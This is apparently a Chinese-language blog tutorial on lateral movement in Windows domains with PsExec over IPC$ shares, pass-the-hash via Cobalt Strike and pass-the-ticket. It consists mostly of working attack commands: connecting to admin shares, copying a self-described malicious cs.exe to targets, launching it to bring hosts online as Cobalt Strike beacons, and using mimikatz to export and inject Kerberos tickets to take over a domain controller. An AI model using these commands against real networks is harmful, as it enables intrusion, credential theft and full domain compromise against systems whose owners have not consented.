PsExec横向:IPC&PTH&PTT

一.IPC下的PsExec

二.PTH下的psexec(CS操作)

三.PTT下的psexec





PsExec工具:

psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口,只需要对方开启admin$共享和ipc$ (该共享默认开启,依赖于445端口)。但是,假如目标主机开启了防火墙(防火墙禁止445端口连接),psexec也是不能使用的,会提示找不到网络路径。由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中

PsExec常用参数:

psexec.exe \\ip -u administrator -p admin cmd 进⼊半交互式shell

PsExec -accepteula \\192.168.108.101 -s cmd.exe 建立交互的shell

psexec \\ip - uadministrator -p admin -w c:\cmd 进⼊交互式shell,且c:\是⽬标机器的⼯作⽬录

psexec \\ip -u administrator -p admin whoami all 执行命令

psexec \\ip -u administrator -p admin -d c:\beacon.exe 执行文件

psexec \\ip -u administrator -p admin -h -d c:\beacon.exe UAC的⽤⼾权限执行文件

一.IPC下的PsExec

实验利用:

1.先通过信息收集,得到目标机器的账号密码,建立IPC连接

net use \\192.168.11.147\ipc$ " " /user:administrator

2.连接成功以后,查看一下它的IP:

psexec.exe -accepteula \\192.168.11.147 -s ipconfig

3.复制恶意程序

copy C:\Users\admin\Desktop\cs.exe \\192.168.11.147\C$

4.上线CS

psexec.exe -accepteula \\192.168.11.147 -h -d c:\cs.exe

二.PTH下的psexec,(CS操作)

1.通过信息收集,找到登录凭证

2.找到通过扫描的目标地址

3.进行psexec攻击上线

4.成功上线

三.PTT下的psexec

1.上传psexec

2.导出内存的票据:

mimikatz  sekurlsa::tickets /export

3.清除内存中的票据

shell klist purge

mimikatz kerberos::purge

4.将高权限的票据文件注入内存

mimikatz kerberos::ptt [0;1aa366]-2-0-40e10000-Administrator@krbtgt-HACK.COM.kirbi

5.查看票据:

shell klist

mimikatz kerberos::tgt

6.远程复制:

copy C:\Users\admin\Desktop\cs.exe \\dc.hack.com\C$

7.远程上线域控

shell psexec.exe -accepteula \\dc.hack.com -h -d c:\cs.exe

  • 40
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值